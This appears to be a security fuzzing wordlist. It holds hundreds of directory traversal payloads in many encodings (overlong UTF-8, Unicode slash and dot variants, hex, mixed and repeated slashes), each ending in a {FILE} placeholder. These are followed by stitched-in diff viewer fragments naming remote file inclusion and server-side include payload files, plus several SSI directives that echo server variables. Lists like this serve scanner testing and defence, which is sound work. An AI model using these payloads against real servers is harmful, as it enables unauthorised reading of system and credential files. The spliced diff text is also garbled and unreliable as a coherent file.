/..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
/%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
/..%u2216{FILE}
/..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
/..%uEFC8{FILE}
/..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
/..%uF025{FILE}
/..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
/%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
/..0x2f{FILE}
/..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
/0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
/..0x5c{FILE}
/..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
/0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
/0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
/..%c0%2f{FILE}
/..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
/%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
/..%c0%5c{FILE}
/..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
/%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
/%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
////%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/\\\%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/..//{FILE}
/..//..//{FILE}
/..//..//..//{FILE}
/..//..//..//..//{FILE}
/..//..//..//..//..//{FILE}
/..//..//..//..//..//..//{FILE}
/..//..//..//..//..//..//..//{FILE}
/..//..//..//..//..//..//..//..//{FILE}
/..///{FILE}
/..///..///{FILE}
/..///..///..///{FILE}
/..///..///..///..///{FILE}
/..///..///..///..///..///{FILE}
/..///..///..///..///..///..///{FILE}
/..///..///..///..///..///..///..///{FILE}
/..///..///..///..///..///..///..///..///{FILE}
/..\\{FILE}
/..\\..\\{FILE}
/..\\..\\..\\{FILE}
/..\\..\\..\\..\\{FILE}
/..\\..\\..\\..\\..\\{FILE}
/..\\..\\..\\..\\..\\..\\{FILE}
/..\\..\\..\\..\\..\\..\\..\\{FILE}
/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
/..\\\{FILE}
/..\\\..\\\{FILE}
/..\\\..\\\..\\\{FILE}
/..\\\..\\\..\\\..\\\{FILE}
/..\\\..\\\..\\\..\\\..\\\{FILE}
/..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
/./\/./{FILE}
/./\/././\/./{FILE}
/./\/././\/././\/./{FILE}
/./\/././\/././\/././\/./{FILE}
/./\/././\/././\/././\/././\/./{FILE}
/./\/././\/././\/././\/././\/././\/./{FILE}
/./\/././\/././\/././\/././\/././\/././\/./{FILE}
/./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
/.\/\.\{FILE}
/.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
/./../{FILE}
/./.././../{FILE}
/./.././.././../{FILE}
/./.././.././.././../{FILE}
/./.././.././.././.././../{FILE}
/./.././.././.././.././.././../{FILE}
/./.././.././.././.././.././.././../{FILE}
/./.././.././.././.././.././.././.././../{FILE}
/.\..\{FILE}
/.\..\.\..\{FILE}
/.\..\.\..\.\..\{FILE}
/.\..\.\..\.\..\.\..\{FILE}
/.\..\.\..\.\..\.\..\.\..\{FILE}
/.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
/.//..//{FILE}
/.//..//.//..//{FILE}
/.//..//.//..//.//..//{FILE}
/.//..//.//..//.//..//.//..//{FILE}
/.//..//.//..//.//..//.//..//.//..//{FILE}
/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
/.\\..\\{FILE}
/.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
/../{FILE}
/../..//{FILE}
/../..//../{FILE}
/../..//../..//{FILE}
/../..//../..//../{FILE}
/../..//../..//../..//{FILE}
/../..//../..//../..//../{FILE}
/../..//../..//../..//../..//{FILE}
/..\{FILE}
/..\..\\{FILE}
/..\..\\..\{FILE}
/..\..\\..\..\\{FILE}
/..\..\\..\..\\..\{FILE}
/..\..\\..\..\\..\..\\{FILE}
/..\..\\..\..\\..\..\\..\{FILE}
/..\..\\..\..\\..\..\\..\..\\{FILE}
/..///{FILE}
/../..///{FILE}
/../..//..///{FILE}
/../..//../..///{FILE}
/../..//../..//..///{FILE}
/../..//../..//../..///{FILE}
/../..//../..//../..//..///{FILE}
/../..//../..//../..//../..///{FILE}
/..\\\{FILE}
/..\..\\\{FILE}
/..\..\\..\\\{FILE}
/..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\..\..\\\{FILE}
/\..%2f
/\..%2f\..%2f
/\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}

2241
attack/rfi/rfi.txt Normal file
View file

File diff suppressed because it is too large Load diff

78
attack/server-side-include/server-side-includes-generic.txt Normal file
View file

@ -0,0 +1,78 @@
<!--#config errmsg="File not found, informs users and password"-->
<!--#config timefmt="A %B %d %Y %r"-->
<!--#echo var="auth_type" -->
<!--#echo var="content_length" -->
